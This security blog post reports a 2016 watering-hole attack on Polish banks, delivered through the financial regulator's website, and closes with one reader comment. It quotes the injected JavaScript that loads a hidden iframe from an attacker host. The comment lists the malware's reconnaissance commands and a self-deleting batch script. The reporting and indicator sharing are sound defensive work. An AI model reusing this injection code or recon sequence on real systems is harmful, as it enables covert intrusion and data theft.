Several Polish banks hacked, information stolen by unknown attackers

Polish banks are frantically scanning their workstations and servers while checking logs in the search of signs of infection after some of them noticed unusual network activity and unauthorised files on key machines within their networks. This is – by far – the most serious information security incident we have seen in Poland.

It has been a busy week in SOCs all over Polish financial sector. At least a few of Polish 20-something commercial banks have already confirmed being victims of a malware infection while others keep looking. Network traffic to exotic locations and encrypted executables nobody recognised on some servers were the first signs of trouble. A little more than a week ago one of the banks detected strange malware present in a few workstations. Having established basic indicators of compromise managed to share that information with other banks, who started asking their SIEMs for information. In some cases the results came back positive.


Preliminary investigation suggests that the starting point for the infection could have been located on the webserver of Polish financial sector regulatory body, Polish Financial Supervision Authority ( Due to a slight modification of one of the local JS files, an external JS file was loaded, which could have executed malicious payloads on selected targets. This would be really ironic if the website of the key institution responsible for assuring proper security level in the banking sector was used to attack it.

Current website status is “under maintenance”

Data from PassiveTotal does confirm the finding related to external resources included in website since 2016-10-07 till yesterday.

To unauthorised code was located in the following file:

and looked like that:

document.write("<div id='efHpTk' width='0px' height='0px'><iframe name='forma' src='https://sap.misapor
.ch/vishop/view.jsp?pagenum=1' width='145px' height='146px' style='left:-2144px;position:absolute;top

After successful exploitation malware was downloaded to the workstation, where, once executed, connected to some foreign servers and could be used to perform network reconnaissance, lateral movement and data exfiltration. At least in some cases the attackers managed to gain control over key servers within bank infrastructure.


While you can find some hashes at the end of this article, we gathered the available information regarding the malware itself. While there might be some elements borrowed from other similar tools and crimeware strategies, the malware used in this attack has not been documented before. It uses some commercial packers and multiple obfuscation methods, has multiple stages, relies on encryption and at the moment of initial analysis was not recognised by available AV solutions.  The final payload has the functionality of a regular RAT.


While we have no idea of attackers motivation, so far we have no knowledge of any direct financial losses incurred by banks or their customers due to this attack. What is more troubling, some of the victims were able to identify large outgoing data transfers. So far they could not identify the contents of the data as it was encrypted. Investigation continues to fully understand the scope of losses.

Conclusions & IOCs

While this should not come as a surprise, this incident is the perfect example of the statement “you are going to get infected”. Polish financial sector has some of the best people and tools in terms of security and still it looks like the attackers achieved their objectives without major hurdles in at least some cases. On the good side – they were detected and once notified banks were able to quickly identify infected machines and suspicious traffic patterns. The whole process lacked solid information sharing, but this is a problem know  everywhere.

We hope to continue investigating this incident and share with you more details about the malware itself in the future. Meanwhile please find attached some IOCs we can share today:

MD5, SHA1, SHA256 hashes of some samples:




Some C&C IP addresses:

Potentially malicious URLs included in website:

64 thoughts on “Several Polish banks hacked, information stolen by unknown attackers”

  1. It would be nice to see a ‘published date’ on this page (these blog entries?)… can’t tell if its old news or new news when coming in via direct link. Thanks!

  2. This sample 18a451d70f96a1335623b385f0993bcc have other C2, same campaign [Lazarus – Polish Malware]


    Gathering information
    cmd.exe /c “hostname > %TEMP%\TMPE52E.tmp”
    cmd.exe /c “whoami >> %TEMP%\TMPE52E.tmp”
    cmd.exe /c “ver >> %TEMP%\TMPE52E.tmp”
    cmd.exe /c “ipconfig -all >> %TEMP%\TMPE52E.tmp”
    cmd.exe /c “ping >> %TEMP%\TMPE52E.tmp”
    cmd.exe /c “query user >> %TEMP%\TMPE52E.tmp”
    cmd.exe /c “net user >> %TEMP%\TMPE52E.tmp”
    cmd.exe /c “net view >> %TEMP%\TMPE52E.tmp”
    cmd.exe /c “net view /domain >> %TEMP%\TMPE52E.tmp”
    cmd.exe /c “reg query “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings” >> %TEMP%\TMPE52E.tmp”
    cmd.exe /c “tasklist /svc >> %TEMP%\TMPE52E.tmp”
    cmd.exe /c “netstat -ano | find “TCP” >> %TEMP%\TMPE52E.tmp”
    cmd.exe /c “wmic os get lastbootuptime >> %TEMP%\TMPE52E.tmp”
    cmd.exe /c “dir /od /a “%TEMP%\TMPE52E.tmp”
    cmd.exe /c “dir /od /a “%TEMP%\TMPE52E.tmp”
    cmd.exe /c “dir /od /a “%TEMP%\TMPE52E.tmp”
    cmd.exe /c “dir /od /a “%PROGRAMFILES%\ >> %TEMP%\TMPE52E.tmp”
    cmd.exe /c “dir /od /a “%PROGRAMFILES%\ >> %TEMP%\TMPE52E.tmp”
    cmd.exe /c “dir /od /a “%s\Desktop” >> %TEMP%\TMPE52E.tmp”
    cmd.exe /c “dir /od /a “%s\Documents” >> %TEMP%\TMPE52E.tmp”
    cmd.exe /c “dir /od /a “%s\Favorites” >> %TEMP%\TMPE52E.tmp”
    cmd.exe cmd /c “”%TEMP%\tmp095j.bat” “C:\18a451d70f96a1335623b385f0993bcc.exe”

    @echo off
    del /a %1
    if exist %1 goto del1
    del /a %0

Leave a Reply

Your email address will not be published. Required fields are marked *